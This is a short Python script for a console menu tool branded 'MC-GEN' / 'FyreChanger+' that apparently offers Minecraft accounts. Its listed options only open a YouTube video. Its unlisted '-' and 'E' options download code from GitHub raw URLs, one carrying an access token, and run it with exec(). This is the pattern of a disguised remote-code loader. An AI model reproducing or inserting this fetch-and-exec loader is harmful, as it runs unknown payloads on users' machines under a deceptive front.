clean = """

                                                \033[1;39m┌────────────────────┐         
                                                \033[1;32m║   \033[1;39m   MC-GEN        \033[1;32m║          
                                                \033[1;39m└────────────────────┘


       \033[1;39m┌─────────────────────────────────────────── Archive ────────────────────────────────────────────┐            
       \033[1;32m║                           \033[1;39m  Version          : \033[1;30m 1.0                                            \033[1;32m║
       \033[1;32m║                           \033[1;39m  Discord          : \033[1;34m discord.gg/4jQnZbN9EM                          \033[1;32m║
       \033[1;32m║                           \033[1;39m  You are using    : \033[1;32m FyreChanger+                                   \033[1;32m║
       \033[1;39m└────────────────────────────────────────────────────────────────────────────────────────────────┘

\033[1;31m[\033[1;39m-\033[1;31m] \033[1;32mMinecraft Section
\033[1;31m[\033[1;39m1\033[1;31m] \033[1;32mMinecraft MFA 
\033[1;31m[\033[1;39m2\033[1;31m] \033[1;32mMinecraft NFA
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
    """
print(clean)


# =======================[RUN]=======================#
while True:
    os.system('cls')
    print(clean)
    chon = input('                                               \033[1;39m[\033[1;31m×\033[1;39m] \033[1;39m>> ')
    if chon == '-':
        os.system('cls')
        print("Leaving SS-Tool")
        exec(requests.get('https://raw.githubusercontent.com/MCCFree/MCC-Loader/main/Minecraft').text)
    elif chon == '1':
        webbrowser.open_new("https://www.youtube.com/watch?v=RjOOYjuOYf0")
    elif chon == '2':
        webbrowser.open_new("https://www.youtube.com/watch?v=RjOOYjuOYf0")
    elif chon == 'E':
        exec(requests.get('https://raw.githubusercontent.com/xNorih/FYRECHAGER-/main/FyreChanger%2B?token=GHSAT0AAAAAACVUJWYEJXH7CLPHL25WBPV6ZVRTKEA').text)

    else:
        continue
